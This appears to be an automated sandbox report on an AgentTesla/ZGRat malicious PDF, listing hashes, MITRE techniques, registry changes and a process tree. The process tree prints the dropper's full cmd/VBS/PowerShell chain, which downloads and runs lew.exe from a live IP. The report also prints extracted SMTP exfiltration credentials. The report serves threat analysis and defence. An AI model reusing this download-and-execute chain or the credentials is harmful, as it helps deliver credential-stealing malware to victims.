agenttesla | ca28f4b4337e38b1d178853fc72012895eaee002bec90d907b177623eed6967c

Analysis

max time kernel
118s
max time network
140s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
12-12-2023 10:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IMG_008542100.pdf
Size

1.3MB
MD5

2f1d6b1a0ba37b4a5b7a62de21886b18
SHA1

f0d8b39999e566f5177dfcfb73843a35f62e0100
SHA256

ca28f4b4337e38b1d178853fc72012895eaee002bec90d907b177623eed6967c
SHA512

636b628e22f7ae1c3ca2f2e7323dc0a4787ae8108ed650594d1bdf0d7b3244ac6c3ce4254e5fc24414b30f3821ee5d8dc831d3f2032561221b27b71fc30501ea
SSDEEP

24:WbKZ7EjswTw+Lwky3lD6E5wkMMJIWgIXG2CSYapAakwOerXQr/3SlJiNno2fuxk2:tmswTwGwkyV1wkMYXG2lNkmXQbOiN0J

Score

10^/10

agenttesla zgrat keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.233.57.103/hih/lew.exe

Extracted

Credentials

Protocol: smtp
Host:
server1.sqsendy.shop
Port:
587
Username:
[email protected]
Password:
&qZV17u[D~36

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
server1.sqsendy.shop
Port:
587
Username:
[email protected]
Password:
&qZV17u[D~36
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect ZGRat V1 34 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2628-72-0x0000000005350000-0x00000000053FA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-73-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-74-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-76-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-78-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-80-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-82-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-84-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-86-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-88-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-90-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-92-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-94-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-96-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-98-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-100-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-102-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-104-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-108-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-110-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-116-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-120-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-122-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-118-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-114-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-112-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-106-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-126-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-124-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-128-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-130-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-132-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-134-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1
behavioral1/memory/2628-136-0x0000000005350000-0x00000000053F3000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2968 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

lew.exelew.exe

pid process

2628 lew.exe
2740 lew.exe
Loads dropped DLL 2 IoCs

Processes:

cmd.exelew.exe

pid process

2680 cmd.exe
2628 lew.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
4	2968	powershell.exe

pid	process
2628	lew.exe
2740	lew.exe

pid	process
2680	cmd.exe
2628	lew.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

lew.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Windows\CurrentVersion\Run\Polsglj = "C:\\Users\\Admin\\AppData\\Roaming\\Polsglj.exe"	lew.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 api.ipify.org
9 api.ipify.org
10 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

lew.exe

description pid process target process

PID 2628 set thread context of 2740 2628 lew.exe lew.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1480 timeout.exe

flow	ioc
8	api.ipify.org
9	api.ipify.org
10	ip-api.com

description	pid	process	target process
PID 2628 set thread context of 2740	2628	lew.exe	lew.exe

pid	process
1480	timeout.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

lew.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	lew.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	lew.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	lew.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	lew.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exelew.exe

pid process

2968 powershell.exe
2740 lew.exe
2740 lew.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

1872 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exelew.exelew.exe

description pid process

Token: SeDebugPrivilege 2968 powershell.exe
Token: SeDebugPrivilege 2628 lew.exe
Token: SeDebugPrivilege 2740 lew.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

AcroRd32.exe

pid process

1872 AcroRd32.exe
1872 AcroRd32.exe
1872 AcroRd32.exe
1872 AcroRd32.exe

pid	process
2968	powershell.exe
2740	lew.exe
2740	lew.exe

pid	process
1872	AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2628	lew.exe
Token: SeDebugPrivilege	2740	lew.exe

pid	process
1872	AcroRd32.exe
1872	AcroRd32.exe
1872	AcroRd32.exe
1872	AcroRd32.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

AcroRd32.execmd.exeWScript.execmd.exelew.exe

description	pid	process	target process
PID 1872 wrote to memory of 2664	1872	AcroRd32.exe	cmd.exe
PID 1872 wrote to memory of 2664	1872	AcroRd32.exe	cmd.exe
PID 1872 wrote to memory of 2664	1872	AcroRd32.exe	cmd.exe
PID 1872 wrote to memory of 2664	1872	AcroRd32.exe	cmd.exe
PID 2664 wrote to memory of 2792	2664	cmd.exe	WScript.exe
PID 2664 wrote to memory of 2792	2664	cmd.exe	WScript.exe
PID 2664 wrote to memory of 2792	2664	cmd.exe	WScript.exe
PID 2664 wrote to memory of 2792	2664	cmd.exe	WScript.exe
PID 2792 wrote to memory of 2680	2792	WScript.exe	cmd.exe
PID 2792 wrote to memory of 2680	2792	WScript.exe	cmd.exe
PID 2792 wrote to memory of 2680	2792	WScript.exe	cmd.exe
PID 2792 wrote to memory of 2680	2792	WScript.exe	cmd.exe
PID 2680 wrote to memory of 2968	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 2968	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 2968	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 2968	2680	cmd.exe	powershell.exe
PID 2680 wrote to memory of 1480	2680	cmd.exe	timeout.exe
PID 2680 wrote to memory of 1480	2680	cmd.exe	timeout.exe
PID 2680 wrote to memory of 1480	2680	cmd.exe	timeout.exe
PID 2680 wrote to memory of 1480	2680	cmd.exe	timeout.exe
PID 2680 wrote to memory of 2628	2680	cmd.exe	lew.exe
PID 2680 wrote to memory of 2628	2680	cmd.exe	lew.exe
PID 2680 wrote to memory of 2628	2680	cmd.exe	lew.exe
PID 2680 wrote to memory of 2628	2680	cmd.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe
PID 2628 wrote to memory of 2740	2628	lew.exe	lew.exe

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\IMG_008542100.pdf"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('http://62.233.57.103/hih/lew.exe', 'lew.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start lew.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs PDF Encrypted. Please click
2⤵
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\encrypted.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c msd89h2j389uh.bat
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://62.233.57.103/hih/lew.exe', 'lew.exe')"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
5⤵
- Delays execution with timeout.exe
PID:1480

C:\Users\Admin\AppData\Local\Temp\lew.exe
lew.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628

C:\Users\Admin\AppData\Local\Temp\lew.exe
C:\Users\Admin\AppData\Local\Temp\lew.exe
6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF58D.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\encrypted.vbs

Filesize
134B

MD5
14e687ecf432ecd2c615f7f62d283f05

SHA1
abae5599f47fd22772927406f763350de7409c4f

SHA256
7d3ea68637f7cdad5fed91e8b364ed35fe46ff79d2e79f386c8eaf502570b51c

SHA512
a5e3a3ec87caed4f5bf99b486abfa74fb00149534fdef8923bc8a14f349808ca00aee1c5dfd33ad4f4177d7fbdfb5bbaf83daaa68b28fb946e930966ef9c7a96

Download Submit
C:\Users\Admin\AppData\Local\Temp\lew.exe

Filesize
34KB

MD5
ca0f3fee83088ec1f2c80ae0d5019737

SHA1
d893377e3a558a785f547e3b4de6b99281e2b90e

SHA256
7a189d9108184f0016e25c54c3f46f832669abd08c4c9bda427ef75614522f64

SHA512
7c77a5e549cacb14900ea92367259f5a5fba96539ea026186f7965892ebdf2bc1945bbf99bdcb99a4c3fd71949f6b554f303c28782fd09414309eea4309a2185

Download Submit
C:\Users\Admin\AppData\Local\Temp\msd89h2j389uh.bat

Filesize
145B

MD5
bb82c259d8ee97aa3f1d4e630566bee2

SHA1
a0bb0a96c5bf08464055f389e4feb33f44539edc

SHA256
0272d568f63ce59dbf3515341d4427f249dc9da30bb46ed26d06823b93233925

SHA512
fd16bae59a85ddc16dd38317d30ad0dd9fd1b3636dea5331ea0c7b02fa2d6c3ecdbecf240dd8883f0c73e20ddf51033e85d2c0a3bee2b568a29302658a18053b

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
fe3c6a9bda0cd3fd992867d325451a09

SHA1
1132832c7d7e72b34f4ecc3557b4d78959d389fc

SHA256
b6179a327c5cea2afb551522e18cdfd077c8f5ecced5b31f762f5169fd6fc793

SHA512
d14f7d9c621258bb28042300d2ec1589c5210808d6978413c581773c82ca92f43c12eeb436f3030cab272eb6dbd40406f11955dd9928e467fe01333cee7c77b3

Download Submit
memory/2628-116-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-78-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-72-0x0000000005350000-0x00000000053FA000-memory.dmp

Filesize
680KB

Download
memory/2628-73-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-74-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-76-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-118-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-80-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-82-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-84-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-86-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-88-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-90-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-92-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-94-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-96-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-98-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-100-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-122-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-104-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-108-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-110-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-71-0x0000000004B40000-0x0000000004B80000-memory.dmp

Filesize
256KB

Download
memory/2628-120-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-102-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-114-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-70-0x00000000717A0000-0x0000000071E8E000-memory.dmp

Filesize
6.9MB

Download
memory/2628-112-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-106-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-126-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-124-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-128-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-130-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-132-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-134-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-136-0x0000000005350000-0x00000000053F3000-memory.dmp

Filesize
652KB

Download
memory/2628-995-0x0000000000490000-0x0000000000491000-memory.dmp

Filesize
4KB

Download
memory/2628-997-0x0000000004C80000-0x0000000004CCC000-memory.dmp

Filesize
304KB

Download
memory/2628-996-0x0000000004230000-0x0000000004272000-memory.dmp

Filesize
264KB

Download
